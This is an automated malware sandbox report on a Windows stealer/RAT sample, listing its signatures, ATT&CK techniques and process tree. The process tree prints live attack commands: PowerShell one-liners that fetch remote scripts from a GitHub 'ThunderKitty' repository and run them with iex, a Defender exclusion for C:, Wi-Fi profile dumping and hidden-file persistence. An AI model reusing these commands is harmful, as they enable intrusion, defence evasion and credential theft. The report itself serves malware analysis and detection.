b1722e1e2bed853593c0d32777593a352901f7d4f670bd06dc0af4b9937da2d7

Resubmissions

18/08/2024, 23:39

240818-3nplcavclq 10

18/08/2024, 23:37

240818-3maqss1ekg 10

18/08/2024, 23:21

240818-3b7w6atekq 10

Analysis

max time kernel
141s
max time network
113s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18/08/2024, 23:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe
Size

14.0MB
MD5

221cb4b58df385e30145f2cda2423c66
SHA1

d16756fb4a42d8d32b72f71cd7d2ad20b073d511
SHA256

b1722e1e2bed853593c0d32777593a352901f7d4f670bd06dc0af4b9937da2d7
SHA512

0bf2e7e714b40706f078210229601f8d6ceeebcf8a89ba123aa38aa3c7b1b493911916cc54ed657bf4bcf8d2a8b6ab4da09148d64000d98bcdcad23aadf00b9c
SSDEEP

196608:5sWQx346uoeXYk8TmIhI0bQ+ko9gvK9aXFFT:52xooKZ8TmsI00+kzvfz

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	3520	powershell.exe
16	2720	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2720	powershell.exe
3520	powershell.exe
4876	powershell.exe
4256	PowerShell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2208	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
14	raw.githubusercontent.com
15	raw.githubusercontent.com
16	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1944	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5068	netsh.exe
428	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
2764	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1560	ipconfig.exe
2288	ipconfig.exe
2764	NETSTAT.EXE

Kills process with taskkill 1 IoCs

evasion

pid	Process
1500	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2720	powershell.exe
4876	powershell.exe
4256	PowerShell.exe
3520	powershell.exe
2720	powershell.exe
4876	powershell.exe
4256	PowerShell.exe
3520	powershell.exe
3520	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	4876	powershell.exe
Token: SeDebugPrivilege	4256	PowerShell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: 33	2376	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2376	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	3520	powershell.exe
Token: SeSecurityPrivilege	3520	powershell.exe
Token: SeTakeOwnershipPrivilege	3520	powershell.exe
Token: SeLoadDriverPrivilege	3520	powershell.exe
Token: SeSystemProfilePrivilege	3520	powershell.exe
Token: SeSystemtimePrivilege	3520	powershell.exe
Token: SeProfSingleProcessPrivilege	3520	powershell.exe
Token: SeIncBasePriorityPrivilege	3520	powershell.exe
Token: SeCreatePagefilePrivilege	3520	powershell.exe
Token: SeBackupPrivilege	3520	powershell.exe
Token: SeRestorePrivilege	3520	powershell.exe
Token: SeShutdownPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeSystemEnvironmentPrivilege	3520	powershell.exe
Token: SeRemoteShutdownPrivilege	3520	powershell.exe
Token: SeUndockPrivilege	3520	powershell.exe
Token: SeManageVolumePrivilege	3520	powershell.exe
Token: 33	3520	powershell.exe
Token: 34	3520	powershell.exe
Token: 35	3520	powershell.exe
Token: 36	3520	powershell.exe
Token: SeIncreaseQuotaPrivilege	3520	powershell.exe
Token: SeSecurityPrivilege	3520	powershell.exe
Token: SeTakeOwnershipPrivilege	3520	powershell.exe
Token: SeLoadDriverPrivilege	3520	powershell.exe
Token: SeSystemProfilePrivilege	3520	powershell.exe
Token: SeSystemtimePrivilege	3520	powershell.exe
Token: SeProfSingleProcessPrivilege	3520	powershell.exe
Token: SeIncBasePriorityPrivilege	3520	powershell.exe
Token: SeCreatePagefilePrivilege	3520	powershell.exe
Token: SeBackupPrivilege	3520	powershell.exe
Token: SeRestorePrivilege	3520	powershell.exe
Token: SeShutdownPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeSystemEnvironmentPrivilege	3520	powershell.exe
Token: SeRemoteShutdownPrivilege	3520	powershell.exe
Token: SeUndockPrivilege	3520	powershell.exe
Token: SeManageVolumePrivilege	3520	powershell.exe
Token: 33	3520	powershell.exe
Token: 34	3520	powershell.exe
Token: 35	3520	powershell.exe
Token: 36	3520	powershell.exe
Token: SeIncreaseQuotaPrivilege	3520	powershell.exe
Token: SeSecurityPrivilege	3520	powershell.exe
Token: SeTakeOwnershipPrivilege	3520	powershell.exe
Token: SeLoadDriverPrivilege	3520	powershell.exe
Token: SeSystemProfilePrivilege	3520	powershell.exe
Token: SeSystemtimePrivilege	3520	powershell.exe
Token: SeProfSingleProcessPrivilege	3520	powershell.exe
Token: SeIncBasePriorityPrivilege	3520	powershell.exe
Token: SeCreatePagefilePrivilege	3520	powershell.exe
Token: SeBackupPrivilege	3520	powershell.exe
Token: SeRestorePrivilege	3520	powershell.exe
Token: SeShutdownPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeSystemEnvironmentPrivilege	3520	powershell.exe
Token: SeRemoteShutdownPrivilege	3520	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 1092 wrote to memory of 2720	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	85
PID 1092 wrote to memory of 2720	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	85
PID 1092 wrote to memory of 4876	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	86
PID 1092 wrote to memory of 4876	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	86
PID 1092 wrote to memory of 3520	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	87
PID 1092 wrote to memory of 3520	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	87
PID 1092 wrote to memory of 4256	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	89
PID 1092 wrote to memory of 4256	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	89
PID 1092 wrote to memory of 320	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	90
PID 1092 wrote to memory of 320	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	90
PID 1092 wrote to memory of 4144	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	91
PID 1092 wrote to memory of 4144	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	91
PID 1092 wrote to memory of 4156	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	92
PID 1092 wrote to memory of 4156	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	92
PID 4144 wrote to memory of 3892	4144	cmd.exe	93
PID 4144 wrote to memory of 3892	4144	cmd.exe	93
PID 2720 wrote to memory of 1904	2720	powershell.exe	94
PID 2720 wrote to memory of 1904	2720	powershell.exe	94
PID 1904 wrote to memory of 3640	1904	csc.exe	114
PID 1904 wrote to memory of 3640	1904	csc.exe	114
PID 3520 wrote to memory of 4880	3520	powershell.exe	97
PID 3520 wrote to memory of 4880	3520	powershell.exe	97
PID 1092 wrote to memory of 1500	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	95
PID 1092 wrote to memory of 1500	1092	2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe	95
PID 4880 wrote to memory of 4568	4880	csc.exe	98
PID 4880 wrote to memory of 4568	4880	csc.exe	98
PID 3520 wrote to memory of 5068	3520	powershell.exe	103
PID 3520 wrote to memory of 5068	3520	powershell.exe	103
PID 3520 wrote to memory of 5036	3520	powershell.exe	105
PID 3520 wrote to memory of 5036	3520	powershell.exe	105
PID 5036 wrote to memory of 2456	5036	net.exe	106
PID 5036 wrote to memory of 2456	5036	net.exe	106
PID 3520 wrote to memory of 2208	3520	powershell.exe	107
PID 3520 wrote to memory of 2208	3520	powershell.exe	107
PID 3520 wrote to memory of 2396	3520	powershell.exe	108
PID 3520 wrote to memory of 2396	3520	powershell.exe	108
PID 3520 wrote to memory of 3880	3520	powershell.exe	109
PID 3520 wrote to memory of 3880	3520	powershell.exe	109
PID 3880 wrote to memory of 2356	3880	net.exe	110
PID 3880 wrote to memory of 2356	3880	net.exe	110
PID 3520 wrote to memory of 2288	3520	powershell.exe	112
PID 3520 wrote to memory of 2288	3520	powershell.exe	112
PID 3520 wrote to memory of 3640	3520	powershell.exe	114
PID 3520 wrote to memory of 3640	3520	powershell.exe	114
PID 3640 wrote to memory of 2564	3640	net.exe	115
PID 3640 wrote to memory of 2564	3640	net.exe	115
PID 3520 wrote to memory of 2808	3520	powershell.exe	116
PID 3520 wrote to memory of 2808	3520	powershell.exe	116
PID 3520 wrote to memory of 2764	3520	powershell.exe	117
PID 3520 wrote to memory of 2764	3520	powershell.exe	117
PID 3520 wrote to memory of 3992	3520	powershell.exe	118
PID 3520 wrote to memory of 3992	3520	powershell.exe	118
PID 3520 wrote to memory of 1560	3520	powershell.exe	119
PID 3520 wrote to memory of 1560	3520	powershell.exe	119
PID 3520 wrote to memory of 976	3520	powershell.exe	120
PID 3520 wrote to memory of 976	3520	powershell.exe	120
PID 3520 wrote to memory of 1944	3520	powershell.exe	121
PID 3520 wrote to memory of 1944	3520	powershell.exe	121
PID 3520 wrote to memory of 428	3520	powershell.exe	122
PID 3520 wrote to memory of 428	3520	powershell.exe	122

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4156	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2720
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a5e5tbtf\a5e5tbtf.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1904
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8FEC.tmp" "c:\Users\Admin\AppData\Local\Temp\a5e5tbtf\CSCA13E0441171B4675BECE425EED3A8EC.TMP"
      4⤵
      PID:3640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zp42yqip\zp42yqip.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4880
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9134.tmp" "c:\Users\Admin\AppData\Local\Temp\zp42yqip\CSC799E89EB43014738B46538163E8E3BAE.TMP"
      4⤵
      PID:4568
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:5068
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:2456
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2208
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:2396
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3880
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:2356
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:2288
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3640
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:2564
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:2808
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:2764
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:3992
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:1560
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:976
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:1944
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:428
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4256
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:320
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4144
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:3892
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:4156
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1500

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4fc 0x2b4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2376

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

